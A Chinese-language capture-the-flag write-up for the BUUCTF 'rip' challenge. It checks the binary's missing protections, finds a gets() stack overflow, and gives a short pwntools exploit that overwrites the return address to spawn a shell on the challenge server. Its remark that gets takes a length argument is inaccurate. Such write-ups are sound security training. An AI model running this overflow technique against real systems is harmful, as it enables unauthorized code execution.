BUUCTF-PWN-rip
首先查保护–>看链接类型–>赋予程序可执行权限–>试运行
64位程序,小端序
开启部分RELRO-----got表可写
未开启canary保护-----可能存在栈溢出
未开启NX保护-----堆栈可执行
未开启PIE-----程序地址为真实地址
RWX----有可读可写可执行段
动态链接
ida一下,看一下主函数
这里的gets(&s, argv); gets第一个参数是要输出的字符串首地址,第二个参数是输出的字符串的长度
s占0xf个字节,这里argv的值是未知的,但这个程序能利用的也只能是这里的栈溢出,试一下
exp
from pwn import* # pwntools函数导入
sh = remote("node4.buuoj.cn",25534)# 连接靶机的服务,需要输入对应的ip地址和端口号
payload = b'a'*0xf + b'b' * 0x8 + p64(0x40118A) # 输入payload来进行操作以拿到程序的shell
sh.sendline(payload)
# sendline() - 发送带回车符的字符串
# sendline() 和 send() 唯一的区别就是在发送的字符串后面加上了回车换行符.
sh.interactive() # 发送命令进行交互, sh.interactive()允许我们在终端里将命令传送到靶机服务器
运行一下
成功获得shell